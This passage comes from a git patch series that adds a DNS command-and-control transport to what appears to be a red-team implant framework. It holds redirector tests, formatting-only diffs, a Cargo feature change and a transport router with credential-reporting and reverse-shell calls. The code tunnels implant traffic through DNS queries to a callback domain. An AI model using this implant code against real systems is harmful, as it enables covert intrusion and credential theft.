uint32) { + defer wg.Done() + + val, ok := 
r.conversations.Load("concurrent") + if !ok { + return + } + conv := val.(*Conversation) + conv.mu.Lock() + conv.Chunks[seq] = []byte{byte(seq)} + conv.mu.Unlock() + }(i) } -} + wg.Wait() -func (s *stubUpstream) ClientConn() *grpc.ClientConn { - return s.clientConn + // Verify all chunks stored + val, ok := r.conversations.Load("concurrent") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 100) } -func (s *stubUpstream) Close() { - s.clientConn.Close() - s.server.Stop() +// TestBuildDNSResponse tests DNS response packet construction +func TestBuildDNSResponse(t *testing.T) { + r := &Redirector{} + + // Create a mock UDP connection for testing + serverAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0") + require.NoError(t, err) + serverConn, err := net.ListenUDP("udp", serverAddr) + require.NoError(t, err) + defer serverConn.Close() + + clientAddr, err := net.ResolveUDPAddr("udp", "127.0.0.1:0") + require.NoError(t, err) + clientConn, err := net.ListenUDP("udp", clientAddr) + require.NoError(t, err) + defer clientConn.Close() + + t.Run("TXT record response", func(t *testing.T) { + r.sendDNSResponse(serverConn, clientConn.LocalAddr().(*net.UDPAddr), 0x1234, "test.dnsc2.realm.pub", txtRecordType, []byte("hello")) + + buf := make([]byte, 512) + clientConn.SetReadDeadline(time.Now().Add(time.Second)) + n, _, err := clientConn.ReadFromUDP(buf) + require.NoError(t, err) + + // Verify transaction ID + assert.Equal(t, uint16(0x1234), uint16(buf[0])<<8|uint16(buf[1])) + // Verify it's a response (QR bit set) + assert.True(t, buf[2]&0x80 != 0) + // Verify answer count is 1 + assert.Equal(t, uint16(1), uint16(buf[6])<<8|uint16(buf[7])) + + // Response should contain data + assert.Greater(t, n, 12) + }) } -func testListener(t *testing.T) (net.Listener, error) { - t.Helper() - return net.Listen("tcp", "127.0.0.1:0") +// TestHandleDataPacket tests DATA packet processing and chunk storage +func TestHandleDataPacket(t *testing.T) { + t.Run("store 
single chunk", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation first with INIT - set TotalChunks > 1 to avoid completion + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 2, // Prevent completion on first chunk + DataCrc32: crc32.ChecksumIEEE([]byte{0x01, 0x02}), + FileSize: 2, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "data1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send DATA packet + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "data1234", + Sequence: 1, + Data: []byte{0x01}, + } + + statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + require.NoError(t, err) + + // Verify STATUS response + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(statusData, &statusPacket) + require.NoError(t, err) + assert.Equal(t, dnspb.PacketType_PACKET_TYPE_STATUS, statusPacket.Type) + assert.Equal(t, "data1234", statusPacket.ConversationId) + + // Verify chunk was stored + val, ok := r.conversations.Load("data1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 1) + assert.Equal(t, []byte{0x01}, conv.Chunks[1]) + }) + + t.Run("store multiple chunks with gaps", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 5, + DataCrc32: 0, + FileSize: 5, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "gaps1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send chunks 1, 3, 5 (gaps at 
2, 4) + for _, seq := range []uint32{1, 3, 5} { + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "gaps1234", + Sequence: seq, + Data: []byte{byte(seq)}, + } + + statusData, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + require.NoError(t, err) + + // Parse STATUS response + var statusPacket dnspb.DNSPacket + err = proto.Unmarshal(statusData, &statusPacket) + require.NoError(t, err) + + // Should always have ACKs for received chunks + assert.NotEmpty(t, statusPacket.Acks) + // NACKs will appear after gaps - not on first chunk + } + + // Verify chunks stored + val, ok := r.conversations.Load("gaps1234") + require.True(t, ok) + conv := val.(*Conversation) + assert.Len(t, conv.Chunks, 3) + assert.Equal(t, []byte{1}, conv.Chunks[1]) + assert.Equal(t, []byte{3}, conv.Chunks[3]) + assert.Equal(t, []byte{5}, conv.Chunks[5]) + assert.False(t, conv.Completed) // Not all chunks received + }) + + t.Run("unknown conversation", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + dataPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "unknown", + Sequence: 1, + Data: []byte{0x01}, + } + + _, err := r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + assert.Error(t, err) + assert.Contains(t, err.Error(), "conversation not found") + }) + + t.Run("sequence out of bounds", func(t *testing.T) { + r := &Redirector{} + ctx := context.Background() + + // Create conversation + initPayload := &dnspb.InitPayload{ + MethodCode: "/c2.C2/ClaimTasks", + TotalChunks: 3, + DataCrc32: 0, + } + payloadBytes, err := proto.Marshal(initPayload) + require.NoError(t, err) + + initPacket := &dnspb.DNSPacket{ + Type: dnspb.PacketType_PACKET_TYPE_INIT, + ConversationId: "bounds1234", + Data: payloadBytes, + } + _, err = r.handleInitPacket(initPacket) + require.NoError(t, err) + + // Send chunk with sequence > TotalChunks + dataPacket := &dnspb.DNSPacket{ + Type: 
dnspb.PacketType_PACKET_TYPE_DATA, + ConversationId: "bounds1234", + Sequence: 10, + Data: []byte{0x01}, + } + + _, err = r.handleDataPacket(ctx, nil, dataPacket, txtRecordType) + assert.Error(t, err) + assert.Contains(t, err.Error(), "sequence out of bounds") + }) } -// TestCRCMismatch tests CRC validation failure -func TestCRCMismatch(t *testing.T) { - r := newTestRedirector() +// TestProcessCompletedConversation tests data reassembly and CRC validation +func TestProcessCompletedConversation(t *testing.T) { + t.Run("successful reassembly and CRC validation", func(t *testing.T) { + data := []byte{0x01, 0x02, 0x03, 0x04, 0x05} + expectedCRC := crc32.ChecksumIEEE(data) + + conv := &Conversation{ + ID: "complete1234", + MethodPath: "/test/method", + TotalChunks: 3, + ExpectedCRC: expectedCRC, + ExpectedDataSize: uint32(len(data)), + Chunks: map[uint32][]byte{ + 1: {0x01, 0x02}, + 2: {0x03, 0x04}, + 3: {0x05}, + }, + } - // Create conversation with wrong CRC - methodCode := "ct" - totalChunksStr := "00001" - wrongCRC := dnsredirector.EncodeBase36CRC(12345) // Wrong CRC - initPayload := methodCode + totalChunksStr + wrongCRC + // Mock upstream that returns empty response + // Since we can't easily mock grpc.ClientConn, we'll test the reassembly logic + // by directly checking the data assembly - convID, err := r.HandleInitPacket("temp", initPayload) - require.NoError(t, err) + // Manually reassemble to test logic + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + chunk, ok := conv.Chunks[i] + require.True(t, ok, "missing chunk %d", i) + fullData = append(fullData, chunk...) 
+ } - convIDStr := string(convID) + assert.Equal(t, data, fullData) + actualCRC := crc32.ChecksumIEEE(fullData) + assert.Equal(t, expectedCRC, actualCRC) + assert.Equal(t, conv.ExpectedDataSize, uint32(len(fullData))) + }) - // Send data with different content - actualData := []byte{0xFF, 0xFF, 0xFF, 0xFF} - _, err = r.HandleDataPacket(convIDStr, 0, actualData) - require.NoError(t, err) + t.Run("CRC mismatch detection", func(t *testing.T) { + data := []byte{0x01, 0x02, 0x03} + wrongCRC := uint32(0xDEADBEEF) + + conv := &Conversation{ + ID: "crcfail1234", + MethodPath: "/test/method", + TotalChunks: 1, + ExpectedCRC: wrongCRC, + Chunks: map[uint32][]byte{ + 1: data, + }, + } - // Note: CRC validation now happens automatically when all chunks received + // Test CRC validation logic + var fullData []byte + for i := uint32(1); i <= conv.TotalChunks; i++ { + fullData = append(fullData, conv.Chunks[i]...) + } + + actualCRC := crc32.ChecksumIEEE(fullData) + assert.NotEqual(t, wrongCRC, actualCRC, "CRC should mismatch") + }) } From 54e8e0d200e8f870fffbc492cb46a3905e9a2c3c Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 22:37:41 -0600 Subject: [PATCH 10/17] fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt fmt --- implants/lib/transport/src/dns.rs | 82 +++++++++++++++++++++---------- 1 file changed, 56 insertions(+), 26 deletions(-) diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index 32ee0ee0e..20c29adfd 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -519,7 +519,10 @@ impl DNS { chunks: &[Vec], conv_id: &str, total_chunks: usize, - ) -> Result<(std::collections::HashSet, std::collections::HashSet)> { + ) -> 
Result<( + std::collections::HashSet, + std::collections::HashSet, + )> { use std::collections::HashSet; let mut acknowledged = HashSet::new(); @@ -669,8 +672,11 @@ impl DNS { match self.send_packet(retransmit_packet).await { Ok(response_data) => { - let (acks, nacks) = - Self::process_chunk_response(&response_data, nack_seq, total_chunks)?; + let (acks, nacks) = Self::process_chunk_response( + &response_data, + nack_seq, + total_chunks, + )?; // Process ACKs for ack_seq in acks { @@ -698,11 +704,7 @@ impl DNS { } /// Fetch response from server, handling potentially chunked responses - async fn fetch_response( - &mut self, - conv_id: &str, - total_chunks: usize, - ) -> Result> { + async fn fetch_response(&mut self, conv_id: &str, total_chunks: usize) -> Result> { log::debug!( "DNS: All {} chunks acknowledged, sending FETCH", total_chunks @@ -736,7 +738,9 @@ impl DNS { // Check if response is chunked if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) { if metadata.total_chunks > 0 { - return self.fetch_chunked_response(conv_id, total_chunks, &metadata).await; + return self + .fetch_chunked_response(conv_id, total_chunks, &metadata) + .await; } } @@ -794,14 +798,21 @@ impl DNS { method_code: &str, ) -> Result> { // Validate and prepare chunks - let (chunk_size, total_chunks, data_crc) = self.validate_and_prepare_chunks(&request_data)?; + let (chunk_size, total_chunks, data_crc) = + self.validate_and_prepare_chunks(&request_data)?; // Generate conversation ID let conv_id = Self::generate_conv_id(); // Send INIT packet - self.send_init_packet(&conv_id, method_code, total_chunks, request_data.len(), data_crc) - .await?; + self.send_init_packet( + &conv_id, + method_code, + total_chunks, + request_data.len(), + data_crc, + ) + .await?; // Prepare chunks let chunks: Vec> = request_data @@ -1150,8 +1161,8 @@ mod tests { #[test] fn test_new_single_server() { - let dns = - DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should 
parse"); + let dns = DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None) + .expect("should parse"); assert_eq!(dns.base_domain, "dnsc2.realm.pub"); assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string())); @@ -1174,8 +1185,11 @@ mod tests { #[test] fn test_new_record_type_a() { - let dns = DNS::new("dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), None) - .expect("should parse"); + let dns = DNS::new( + "dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(), + None, + ) + .expect("should parse"); assert_eq!(dns.record_type, DnsRecordType::A); } @@ -1198,14 +1212,16 @@ mod tests { #[test] fn test_new_wildcard_uses_fallbacks() { - let dns = DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + let dns = + DNS::new("dns://*?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); // Should have fallback servers assert!(!dns.dns_servers.is_empty()); // Fallback servers include known DNS resolvers - let has_fallback = dns.dns_servers.iter().any(|s| { - s.contains("1.1.1.1") || s.contains("8.8.8.8") - }); + let has_fallback = dns + .dns_servers + .iter() + .any(|s| s.contains("1.1.1.1") || s.contains("8.8.8.8")); assert!(has_fallback, "Should have fallback DNS servers"); } @@ -1213,12 +1229,16 @@ mod tests { fn test_new_missing_domain() { let result = DNS::new("dns://8.8.8.8:53".to_string(), None); assert!(result.is_err()); - assert!(result.unwrap_err().to_string().contains("domain parameter is required")); + assert!(result + .unwrap_err() + .to_string() + .contains("domain parameter is required")); } #[test] fn test_new_without_scheme() { - let dns = DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); + let dns = + DNS::new("8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None).expect("should parse"); assert_eq!(dns.base_domain, "dnsc2.realm.pub"); } @@ -1256,7 +1276,11 @@ mod tests { // Each label should be <= 63 chars for label in subdomain.split('.') { - 
assert!(label.len() <= MAX_LABEL_LENGTH, "Label too long: {}", label.len()); + assert!( + label.len() <= MAX_LABEL_LENGTH, + "Label too long: {}", + label.len() + ); } } @@ -1285,7 +1309,11 @@ mod tests { // Should have multiple labels (dots) let label_count = subdomain.matches('.').count(); - assert!(label_count > 1, "Expected multiple labels, got {}", label_count); + assert!( + label_count > 1, + "Expected multiple labels, got {}", + label_count + ); } // ============================================================ @@ -1301,7 +1329,9 @@ mod tests { record_type: DnsRecordType::TXT, }; - let (query, txid) = dns.build_dns_query("test.dnsc2.realm.pub").expect("should build"); + let (query, txid) = dns + .build_dns_query("test.dnsc2.realm.pub") + .expect("should build"); // Header should be 12 bytes minimum assert!(query.len() > 12); @@ -1400,7 +1430,7 @@ mod tests { assert!(chunk_size > 0); assert_eq!(total_chunks, 1); // Even empty data needs 1 chunk - // CRC is deterministic - just verify it's calculated + // CRC is deterministic - just verify it's calculated assert_eq!(crc, DNS::calculate_crc32(&[])); } From 8535045632cfc3e07ebe698ebba3359a0b9c28b8 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Wed, 24 Dec 2025 22:56:00 -0600 Subject: [PATCH 11/17] added dns to imixv2 --- implants/imixv2/Cargo.toml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/implants/imixv2/Cargo.toml b/implants/imixv2/Cargo.toml index b531ad720..79ebdd8c9 100644 --- a/implants/imixv2/Cargo.toml +++ b/implants/imixv2/Cargo.toml @@ -7,9 +7,10 @@ edition = "2024" crate-type = ["cdylib"] [features] -default = ["install", "grpc", "http1"] +default = ["install", "grpc", "http1", "dns"] grpc = ["transport/grpc"] http1 = ["transport/http1"] +dns = ["transport/dns"] win_service = [] install = [] From d71c17212f31a11619189d8ed5ed5317bd31a468 Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> 
Date: Wed, 24 Dec 2025 23:38:53 -0600 Subject: [PATCH 12/17] line endings ? --- implants/lib/transport/src/lib.rs | 726 +++++++++++++++--------------- 1 file changed, 363 insertions(+), 363 deletions(-) diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 6b5af2907..44b51ff39 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -1,363 +1,363 @@ -use anyhow::{anyhow, Result}; -use pb::c2::*; -use std::sync::mpsc::{Receiver, Sender}; - -#[cfg(feature = "grpc")] -mod grpc; - -#[cfg(feature = "grpc-doh")] -mod dns_resolver; - -#[cfg(feature = "http1")] -mod http; - -#[cfg(feature = "dns")] -mod dns; - -#[cfg(feature = "mock")] -mod mock; -#[cfg(feature = "mock")] -pub use mock::MockTransport; - -mod transport; -pub use transport::Transport; - -#[derive(Clone)] -pub enum ActiveTransport { - #[cfg(feature = "grpc")] - Grpc(grpc::GRPC), - #[cfg(feature = "http1")] - Http(http::HTTP), - #[cfg(feature = "dns")] - Dns(dns::DNS), - #[cfg(feature = "mock")] - Mock(mock::MockTransport), - Empty, -} - -impl Transport for ActiveTransport { - fn init() -> Self { - Self::Empty - } - - fn new(uri: String, proxy_uri: Option) -> Result { - match uri { - // 1. gRPC: Passthrough - s if s.starts_with("http://") || s.starts_with("https://") => { - #[cfg(feature = "grpc")] - return Ok(ActiveTransport::Grpc(grpc::GRPC::new(s, proxy_uri)?)); - #[cfg(not(feature = "grpc"))] - return Err(anyhow!("gRPC transport not enabled")); - } - - // 2. gRPC: Rewrite (Order: longest match 'grpcs' first) - s if s.starts_with("grpc://") || s.starts_with("grpcs://") => { - #[cfg(feature = "grpc")] - { - let new = s - .replacen("grpcs://", "https://", 1) - .replacen("grpc://", "http://", 1); - Ok(ActiveTransport::Grpc(grpc::GRPC::new(new, proxy_uri)?)) - } - #[cfg(not(feature = "grpc"))] - return Err(anyhow!("gRPC transport not enabled")); - } - - // 3. 
HTTP1: Rewrite - s if s.starts_with("http1://") || s.starts_with("https1://") => { - #[cfg(feature = "http1")] - { - let new = s - .replacen("https1://", "https://", 1) - .replacen("http1://", "http://", 1); - Ok(ActiveTransport::Http(http::HTTP::new(new, proxy_uri)?)) - } - #[cfg(not(feature = "http1"))] - return Err(anyhow!("http1 transport not enabled")); - } - - // 4. DNS - s if s.starts_with("dns://") => { - #[cfg(feature = "dns")] - { - Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) - } - #[cfg(not(feature = "dns"))] - return Err(anyhow!("DNS transport not enabled")); - } - - _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), - } - } - - async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.claim_tasks(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.claim_tasks(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.claim_tasks(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.claim_tasks(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn fetch_asset( - &mut self, - request: FetchAssetRequest, - sender: Sender, - ) -> Result<()> { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.fetch_asset(request, sender).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.fetch_asset(request, sender).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.fetch_asset(request, sender).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.fetch_asset(request, sender).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_credential( - &mut self, - request: ReportCredentialRequest, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_credential(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_credential(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => 
t.report_credential(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_credential(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_file( - &mut self, - request: Receiver, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_file(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_file(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_file(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_file(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_process_list( - &mut self, - request: ReportProcessListRequest, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_process_list(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_process_list(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_process_list(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_process_list(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn report_task_output( - &mut self, - request: ReportTaskOutputRequest, - ) -> Result { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.report_task_output(request).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.report_task_output(request).await, - #[cfg(feature = "dns")] - Self::Dns(t) => t.report_task_output(request).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.report_task_output(request).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - async fn reverse_shell( - &mut self, - rx: tokio::sync::mpsc::Receiver, - tx: tokio::sync::mpsc::Sender, - ) -> Result<()> { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.reverse_shell(rx, tx).await, - #[cfg(feature = "http1")] - Self::Http(t) => t.reverse_shell(rx, tx).await, - #[cfg(feature = 
"dns")] - Self::Dns(t) => t.reverse_shell(rx, tx).await, - #[cfg(feature = "mock")] - Self::Mock(t) => t.reverse_shell(rx, tx).await, - Self::Empty => Err(anyhow!("Transport not initialized")), - } - } - - fn get_type(&mut self) -> beacon::Transport { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.get_type(), - #[cfg(feature = "http1")] - Self::Http(t) => t.get_type(), - #[cfg(feature = "dns")] - Self::Dns(t) => t.get_type(), - #[cfg(feature = "mock")] - Self::Mock(t) => t.get_type(), - Self::Empty => beacon::Transport::Unspecified, - } - } - - fn is_active(&self) -> bool { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.is_active(), - #[cfg(feature = "http1")] - Self::Http(t) => t.is_active(), - #[cfg(feature = "dns")] - Self::Dns(t) => t.is_active(), - #[cfg(feature = "mock")] - Self::Mock(t) => t.is_active(), - Self::Empty => false, - } - } - - fn name(&self) -> &'static str { - match self { - #[cfg(feature = "grpc")] - Self::Grpc(t) => t.name(), - #[cfg(feature = "http1")] - Self::Http(t) => t.name(), - #[cfg(feature = "dns")] - Self::Dns(t) => t.name(), - #[cfg(feature = "mock")] - Self::Mock(t) => t.name(), - Self::Empty => "none", - } - } - - #[allow(clippy::vec_init_then_push)] - fn list_available(&self) -> Vec { - let mut list = Vec::new(); - #[cfg(feature = "grpc")] - list.push("grpc".to_string()); - #[cfg(feature = "http1")] - list.push("http".to_string()); - #[cfg(feature = "dns")] - list.push("dns".to_string()); - #[cfg(feature = "mock")] - list.push("mock".to_string()); - list - } -} - -#[cfg(test)] -mod tests { - use super::*; - - #[tokio::test] - #[cfg(feature = "grpc")] - async fn test_routes_to_grpc_transport() { - // All these prefixes should result in the Grpc variant - let inputs = vec![ - // Passthrough cases - "http://127.0.0.1:50051", - "https://127.0.0.1:50051", - // Rewrite cases - "grpc://127.0.0.1:50051", - "grpcs://127.0.0.1:50051", - ]; - - for uri in inputs { - let result = 
ActiveTransport::new(uri.to_string(), None); - - // 1. Assert strictly on the Variant type - assert!( - matches!(result, Ok(ActiveTransport::Grpc(_))), - "URI '{}' did not resolve to ActiveTransport::Grpc", - uri - ); - } - } - - #[tokio::test] - #[cfg(not(feature = "http1"))] - async fn test_routes_to_http1_transport() { - // All these prefixes should result in the Http1 variant - let inputs = vec!["http1://127.0.0.1:8080", "https1://127.0.0.1:8080"]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - - assert!( - matches!(result, Ok(ActiveTransport::Http(_))), - "URI '{}' did not resolve to ActiveTransport::Http", - uri - ); - } - } - - #[tokio::test] - #[cfg(feature = "dns")] - async fn test_routes_to_dns_transport() { - // DNS URIs should result in the Dns variant - let inputs = vec![ - "dns://8.8.8.8:53?domain=example.com", - "dns://*?domain=example.com&type=txt", - "dns://1.1.1.1?domain=test.com&type=a", - ]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - - assert!( - matches!(result, Ok(ActiveTransport::Dns(_))), - "URI '{}' did not resolve to ActiveTransport::Dns", - uri - ); - } - } - - #[tokio::test] - #[cfg(not(feature = "grpc"))] - async fn test_grpc_disabled_error() { - // If the feature is off, these should error out - let inputs = vec!["grpc://foo", "grpcs://foo", "http://foo"]; - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - assert!( - result.is_err(), - "Expected error for '{}' when gRPC feature is disabled", - uri - ); - } - } - - #[tokio::test] - async fn test_unknown_transport_errors() { - let inputs = vec!["ftp://example.com", "ws://example.com", "random-string", ""]; - - for uri in inputs { - let result = ActiveTransport::new(uri.to_string(), None); - assert!( - result.is_err(), - "Expected error for unknown URI scheme: '{}'", - uri - ); - } - } -} +use anyhow::{anyhow, Result}; +use pb::c2::*; +use std::sync::mpsc::{Receiver, Sender}; 
+ +#[cfg(feature = "grpc")] +mod grpc; + +#[cfg(feature = "grpc-doh")] +mod dns_resolver; + +#[cfg(feature = "http1")] +mod http; + +#[cfg(feature = "dns")] +mod dns; + +#[cfg(feature = "mock")] +mod mock; +#[cfg(feature = "mock")] +pub use mock::MockTransport; + +mod transport; +pub use transport::Transport; + +#[derive(Clone)] +pub enum ActiveTransport { + #[cfg(feature = "grpc")] + Grpc(grpc::GRPC), + #[cfg(feature = "http1")] + Http(http::HTTP), + #[cfg(feature = "dns")] + Dns(dns::DNS), + #[cfg(feature = "mock")] + Mock(mock::MockTransport), + Empty, +} + +impl Transport for ActiveTransport { + fn init() -> Self { + Self::Empty + } + + fn new(uri: String, proxy_uri: Option) -> Result { + match uri { + // 1. gRPC: Passthrough + s if s.starts_with("http://") || s.starts_with("https://") => { + #[cfg(feature = "grpc")] + return Ok(ActiveTransport::Grpc(grpc::GRPC::new(s, proxy_uri)?)); + #[cfg(not(feature = "grpc"))] + return Err(anyhow!("gRPC transport not enabled")); + } + + // 2. gRPC: Rewrite (Order: longest match 'grpcs' first) + s if s.starts_with("grpc://") || s.starts_with("grpcs://") => { + #[cfg(feature = "grpc")] + { + let new = s + .replacen("grpcs://", "https://", 1) + .replacen("grpc://", "http://", 1); + Ok(ActiveTransport::Grpc(grpc::GRPC::new(new, proxy_uri)?)) + } + #[cfg(not(feature = "grpc"))] + return Err(anyhow!("gRPC transport not enabled")); + } + + // 3. HTTP1: Rewrite + s if s.starts_with("http1://") || s.starts_with("https1://") => { + #[cfg(feature = "http1")] + { + let new = s + .replacen("https1://", "https://", 1) + .replacen("http1://", "http://", 1); + Ok(ActiveTransport::Http(http::HTTP::new(new, proxy_uri)?)) + } + #[cfg(not(feature = "http1"))] + return Err(anyhow!("http1 transport not enabled")); + } + + // 4. 
DNS + s if s.starts_with("dns://") => { + #[cfg(feature = "dns")] + { + Ok(ActiveTransport::Dns(dns::DNS::new(s, proxy_uri)?)) + } + #[cfg(not(feature = "dns"))] + return Err(anyhow!("DNS transport not enabled")); + } + + _ => Err(anyhow!("Could not determine transport from URI: {}", uri)), + } + } + + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.claim_tasks(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.claim_tasks(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.claim_tasks(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.claim_tasks(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + sender: Sender, + ) -> Result<()> { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.fetch_asset(request, sender).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.fetch_asset(request, sender).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_credential(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_credential(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_credential(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_credential(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_file( + &mut self, + request: Receiver, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_file(request).await, + #[cfg(feature = "http1")] + 
Self::Http(t) => t.report_file(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_file(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_file(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_process_list(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_process_list(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_process_list(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_process_list(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + match self { + #[cfg(feature = "grpc")] + Self::Grpc(t) => t.report_task_output(request).await, + #[cfg(feature = "http1")] + Self::Http(t) => t.report_task_output(request).await, + #[cfg(feature = "dns")] + Self::Dns(t) => t.report_task_output(request).await, + #[cfg(feature = "mock")] + Self::Mock(t) => t.report_task_output(request).await, + Self::Empty => Err(anyhow!("Transport not initialized")), + } + } + + async fn reverse_shell( + &mut self, + rx: tokio::sync::mpsc::Receiver, + tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + match self { + #[cfg(feature 